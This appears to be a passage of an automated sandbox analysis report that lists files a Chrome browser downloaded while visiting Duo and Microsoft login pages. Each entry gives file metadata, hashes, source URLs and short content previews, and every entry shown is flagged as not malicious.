                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):49911
                                                                                                                                          Entropy (8bit):7.994516776763163
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                                                          MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                                                          SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                                                          SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                                                          SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1929
                                                                                                                                          Entropy (8bit):5.59772582163942
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:lmIzzAptreEerJWKBiaWbErTVITVleIV4UL3QibqZ3sVj:1zzATSlrJWKBiD4YXXe4gTZ3sV
                                                                                                                                          MD5:67A70A3E598A16849774E834B81E6774
                                                                                                                                          SHA1:D84E6B5D8FC68C2AA30D1CAB6AFC45DF3047CB5A
                                                                                                                                          SHA-256:4F6EE15DBFE6739D0C206B1BBB53A754C04B04F3CB3020BEB46DD8DCB8AF592E
                                                                                                                                          SHA-512:BBAE9742D2581054C7B700DDFB62B10B2E94C22D4BAD94A03C8E361CF2E400ECDAACF5A94C56DAEC03BE2034FCAD1F4D6EAD04A7003B20BD4E893FC7CA326A20
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5
                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<title>Login</title>.<meta charset="utf-8" />.<meta name="viewport" content="width=device-width, initial-scale=1">.<link rel="stylesheet" href="&#x2f;static&#x2f;css&#x2f;page&#x2f;email-first.css&#x3f;v&#x3d;8132c">.<link rel="shortcut icon" href="&#x2f;static&#x2f;images&#x2f;favicon_duo.ico&#x3f;v&#x3d;e3716" />.</head>.<body>.<div.id="login-parent".data-authkey="AS18RC790S0VEJEVFQ7S".data-custom-accent-color="&#x23;155CDE".data-custom-background="".data-custom-background-color="&#x23;E7E9ED".data-custom-logo-url="https&#x3a;&#x2f;&#x2f;ux-asset-commercial.duosecurity.com&#x2f;customization&#x2f;account&#x2f;pjr5mk7gIVVM96clMnJeaB_2v7s7l9mi0IW7F6yfzFw&#x2f;logo_image.png&#x3f;versionId&#x3d;DzI1NMCJNJv6J3By1BhKLYgM8B5W6KuR".data-custom-username-label="".data-email-first-username="peter.smith&#x40;cisco.com".data-phishing-pro
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1592
                                                                                                                                          Entropy (8bit):4.205005284721148
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                                                                                                          MD5:4E48046CE74F4B89D45037C90576BFAC
                                                                                                                                          SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                                                                                                          SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                                                                                                          SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):3452
                                                                                                                                          Entropy (8bit):5.117912766689607
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                          MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                          SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                          SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                          SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://login.live.com/Me.htm?v=3
                                                                                                                                          Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):61
                                                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):72
                                                                                                                                          Entropy (8bit):4.241202481433726
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 98 x 93, 8-bit/color RGB, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):61
                                                                                                                                          Entropy (8bit):4.035372245524405
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:yionv//thPlNGpMl8kxl/k4E08up:6v/lhP+pk8k7Tp
                                                                                                                                          MD5:AD2BF08E909CB9F989C7BADBF87006CE
                                                                                                                                          SHA1:05E8412EFBA014BF06DAC17941F8121C5D4D6C17
                                                                                                                                          SHA-256:12BF9CC8C45B62C86354CD7FA4E2B3A3CE93B2DC28F1430B953699506B58D5E6
                                                                                                                                          SHA-512:3A7DAFC24D515A3214B25D410ABB6EF25107509142AE0BBCB53EEADB87AFEB29D49BA551D8C2280C2689A523DEBCDFEB0B311A6615B4692A992AB5732FE47117
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:.PNG........IHDR...b...].......$!....IDAT.....$.....IEND.B`.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3620
                                                                                                                                          Entropy (8bit):6.867828878374734
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                          MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                          SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                          SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                          SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1043
                                                                                                                                          Entropy (8bit):4.732223522165644
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:hSG/UdfWDZSYVy5KEGWwvI35Jmrv0c0obXl6f:h/gONF/wpJmr8G1e
                                                                                                                                          MD5:44BF720F31B5F75C31B168A33917F16E
                                                                                                                                          SHA1:FC784F0D6E413F85686841997001A1E421C57437
                                                                                                                                          SHA-256:AB5D7957B1604C8E97D2CD5FCF4C89CED2BE0732CBCA6520B5C7FED43BBB07F0
                                                                                                                                          SHA-512:19952DD6F7C8FB02E83D97770D77522AB402CAF7DCDFEA690CA6D7EA416C7F2702231352715DC5166A938A813D0DD521F0C03BF6CB2DD50BC19F4C611444588B
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:<!DOCTYPE html>.. [if IE 8]> <html lang="en" class="ie ie8"> <![endif]-->. [if IE 9]> <html lang="en" class="ie ie9"> <![endif]-->. [if gt IE 9]> > <html lang="en"> <![endif]-->. <head>. <meta charset="utf-8">. <title>Oops</title>. <link rel="stylesheet" href="/static/css/page/errors.css">. <link rel="shortcut icon" href="/static/images/favicon_duo.ico">. </head>. <body>. <div class="container">. <img height="120px" alt="Error". src="/static/images/oops.png". srcset="/static/images/oops.png 1x, /static/images/oops@2x.png 2x". >.. <p class="large-text">Looks like we're having some server issues.</p>.. <hr>.. <p>If you think something is broken, report a problem.</p>.. <a class="button homepage-button" href="/">. Go to Homepage. </a>.. <a class="button report-button" href="https://duo.com/about/contact" target="_blank" rel="noreferrer noopener">. Report a Probl
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (11150)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):66281
                                                                                                                                          Entropy (8bit):5.01240450581956
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:vgPzcMEe6q41wfaM8e6q4IX/ozWFhlLCl7wuM:vu61wD6IX/oaRHuM
                                                                                                                                          MD5:BB2847894D8A12D9AC4F118B4CB2DD82
                                                                                                                                          SHA1:6847D51B82AD64F98DF2357FB1989C16641A4CA2
                                                                                                                                          SHA-256:8132C31A75DE34EAA44D0E0449C991B2CA86FCFF13C78C29EF2824851E8CC5E3
                                                                                                                                          SHA-512:21675BFDC651C1CBED80CC921639319EB76185903A785D3A1A34F44EFA1C4793F7EF5CD91F1E5C2949691A91F4C7EC2E43BEC4FBB9BC5A849D3536E1E2D93DC4
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cisco.login.duosecurity.com/static/css/page/email-first.css?v=8132c
                                                                                                                                          Preview:html.border-box{box-sizing:border-box}html.border-box *,html.border-box *:before,html.border-box *:after{box-sizing:inherit}body{color:#363f44;color:#363f44;color:var(--color-font-base);font-family:"Helvetica Neue",Helvetica,Arial,Sans-serif;font-size:0.875rem;font-size:0.875rem;font-size:var(--size-font-base);font-weight:400;font-weight:400;font-weight:var(--weight-font-base);line-height:1.5rem;line-height:1.5rem;line-height:var(--size-line-height-body);letter-spacing:0}p{margin-top:0;margin-bottom:0}.caption{font-size:0.75rem;font-size:0.75rem;font-size:var(--size-font-caption);line-height:1.5rem;line-height:1.5rem;line-height:var(--size-line-height-caption);weight:400;weight:400;weight:var(--weight-font-caption-regular)}.caption--bold{weight:900;weight:900;weight:var(--weight-font-caption-bold)}.h1,h2,h3,h4,h5,h6{color:#363f44;color:#363f44;color:var(--color-font-base);font-family:"Helvetica Neue",Helvetica,Arial,Sans-serif;font-size:var(--size-font-header-medium);font-weight:900;fo
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (64612)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):113769
                                                                                                                                          Entropy (8bit):5.492540089333064
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:RS8gIRPY0+r5qnWisLTfM6tQSqLXCIIgbgZ1uXt1EN5eAfGqOD:vgDTMnWRwvDIgb0q7Eb9u
                                                                                                                                          MD5:C6C029BA88D52E5312FEC69603A00340
                                                                                                                                          SHA1:079011F6F0662C11AE907C773EFE8E0C9338EAD0
                                                                                                                                          SHA-256:DDD0BB1C19B3D2D045BFCDE85D2020BBA57854C887A6691B66DBA3DA1BB3AFBE
                                                                                                                                          SHA-512:7DF09CD949A43D53D62D9013718158966508DEC2338491FFB38DC33D2EB85FF5C699792AE578975DA0E4F03CC7EA03774624208D06924EEA4C2EAC92E6E22C60
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[37],{1373:function(e,t,
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65467)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1031501
                                                                                                                                          Entropy (8bit):5.6014998014243
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:5DMw4MRopAcbhMwdPrCvDlJcIH46k+MahMR2VKUxihesK6XS7mNDqO7:Z6eyhMwdP+MR2VKUxi8t6XS7W17
                                                                                                                                          MD5:D833802E90C567AB8732107292F84CDF
                                                                                                                                          SHA1:D20212711CEF8B07052BEA8A2EA61B68C7182D38
                                                                                                                                          SHA-256:488D0552E3B94396B3647F301F73CFB4B70CAC3F1FE89B15CBE11BCD0667C0A6
                                                                                                                                          SHA-512:6E63152281DD5D2E0ACCA939510A849A53ADFB077E4FC603438426E6314861E06D260D3B1353EA86A8FAF2B1501EF1EC5323083AF339EB3294C4E33C7FA16149
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! For license information please see email-first.js.LICENSE.txt */.!function(){var leafPrototypes,getProto,__webpack_modules__={8865:function(__unused_webpack_module,exports,__webpack_require__){"use strict";__webpack_require__(9129),__webpack_require__(4910),__webpack_require__(3370),__webpack_require__(8815),__webpack_require__(7875),__webpack_require__(8543),__webpack_require__(7313),__webpack_require__(175),__webpack_require__(2698),__webpack_require__(3629),__webpack_require__(8039),__webpack_require__(2203),__webpack_require__(6312),__webpack_require__(9372),__webpack_require__(1661),__webpack_require__(8250),__webpack_require__(2692),__webpack_require__(9317),__webpack_require__(2856),__webpack_require__(5667),__webpack_require__(8463),__webpack_require__(3459),__webpack_require__(9e3),__webpack_require__(8866),__webpack_require__(9607),__webpack_require__(7709),__webpack_require__(6679),__webpack_require__(458),__webpack_require__(1893),__webpack_require__(7793),__webpack_req
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):16
                                                                                                                                          Entropy (8bit):3.625
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:HfTORnYn:qRnY
                                                                                                                                          MD5:9B5719B531993D7EEF5EB4C692F2238C
                                                                                                                                          SHA1:9C9A21624C975F0741B743348DE85A09FDA7E669
                                                                                                                                          SHA-256:27008C4818CC0695B1496B0E8026DDFB7999C7FA066F78C61A76AF0FFECEF4BF
                                                                                                                                          SHA-512:39CC9DC2E4DACFA6D1D7E23759ED7FB13C3111992BCA5DAA97CE1ADB37205056118FC1105D85E38B8E902A2F8CD68656AD36D53642DE60368E054BE86942BBA8
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAm1HWDvH6ZtMhIFDVALr7A=?alt=proto
                                                                                                                                          Preview:CgkKBw1QC6+wGgA=
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65473)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):887789
                                                                                                                                          Entropy (8bit):5.604484335646272
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:uDMw4MRO9CvDlJcIHI6k+MamMM2VKX8KQhesKU1XSTmzP2:I6eAMM2VKX8KQ8tU1XSTYu
                                                                                                                                          MD5:AF78A432536AFC7F965DAEB8389A7AF3
                                                                                                                                          SHA1:AC7F7D2759037C67CDB29FCD2F34F99CD533BB19
                                                                                                                                          SHA-256:0F15CE2743F157F1F1D94CA57D2681EC184501CD2D9078FFE90B6DA946C6FB92
                                                                                                                                          SHA-512:C479404F94F86E78BDEB66AF7FE5CA2E62560F448452A58DB56873C36ACE3B2503406B189F00D3D4979268568FFD1238FC4C016FCB7D33C0C9134BAB4876B68C
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! For license information please see login.js.LICENSE.txt */.!function(){var __webpack_modules__={8865:function(__unused_webpack_module,exports,__webpack_require__){"use strict";__webpack_require__(9129),__webpack_require__(4910),__webpack_require__(3370),__webpack_require__(8815),__webpack_require__(7875),__webpack_require__(8543),__webpack_require__(7313),__webpack_require__(175),__webpack_require__(2698),__webpack_require__(3629),__webpack_require__(8039),__webpack_require__(2203),__webpack_require__(6312),__webpack_require__(9372),__webpack_require__(1661),__webpack_require__(8250),__webpack_require__(2692),__webpack_require__(9317),__webpack_require__(2856),__webpack_require__(5667),__webpack_require__(8463),__webpack_require__(3459),__webpack_require__(9e3),__webpack_require__(8866),__webpack_require__(9607),__webpack_require__(7709),__webpack_require__(6679),__webpack_require__(458),__webpack_require__(1893),__webpack_require__(7793),__webpack_require__(4432),__webpack_require
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1797
                                                                                                                                          Entropy (8bit):5.554574873423736
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:lmIzz/pFTVWbErTVMrJEeWPF0IH3Ivma4L8j:1zz//a4SrJlWPFpH3r1LE
                                                                                                                                          MD5:95059EA8E9E5BB168245C8E296AB5A3E
                                                                                                                                          SHA1:976CF054EC0B2246BB71DDDB0AC291F3690D9338
                                                                                                                                          SHA-256:10EBE2F3D255AC1B346518581F273E67A774F942AA6D8A620201E3380A71C42E
                                                                                                                                          SHA-512:AB305FBB511A2355610F26499E2799E44C146ECE9785EA2A142273DEDAD69F52058212AF07F4958E6A55E462AF4D8F258ACAEF76F8402B0F6F59CC178B1819C8
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46
                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<title>Login</title>.<meta charset="utf-8" />.<meta name="viewport" content="width=device-width, initial-scale=1">.<link rel="stylesheet" href="&#x2f;static&#x2f;css&#x2f;page&#x2f;login.css&#x3f;v&#x3d;8850e">.<link rel="shortcut icon" href="&#x2f;static&#x2f;images&#x2f;favicon_duo.ico&#x3f;v&#x3d;e3716" />.</head>.<body>.<div.id="login-parent".data-authkey="ASW3XM3LO8SLC75JQC60".data-scid="4873fe428ab243529767cba103466e46".data-restart-auth-url="https&#x3a;&#x2f;&#x2f;sso-dbbfec7f.sso.duosecurity.com&#x2f;ws&#x2f;sp&#x2f;DIXH9AVY8FAAKO04PYZ8&#x2f;passive&#x3f;scid&#x3d;4873fe428ab243529767cba103466e46".data-phishing-protection-enabled="True".data-remember-username-enabled="True".data-nojs-action="&#x2f;login&#x2f;nojs".data-custom-background="".data-custom-background-color="&#x23;E7E9ED".data-custom-accent-color="&#x23;155CD
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (64612)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):113769
                                                                                                                                          Entropy (8bit):5.492540089333064
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:RS8gIRPY0+r5qnWisLTfM6tQSqLXCIIgbgZ1uXt1EN5eAfGqOD:vgDTMnWRwvDIgb0q7Eb9u
                                                                                                                                          MD5:C6C029BA88D52E5312FEC69603A00340
                                                                                                                                          SHA1:079011F6F0662C11AE907C773EFE8E0C9338EAD0
                                                                                                                                          SHA-256:DDD0BB1C19B3D2D045BFCDE85D2020BBA57854C887A6691B66DBA3DA1BB3AFBE
                                                                                                                                          SHA-512:7DF09CD949A43D53D62D9013718158966508DEC2338491FFB38DC33D2EB85FF5C699792AE578975DA0E4F03CC7EA03774624208D06924EEA4C2EAC92E6E22C60
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
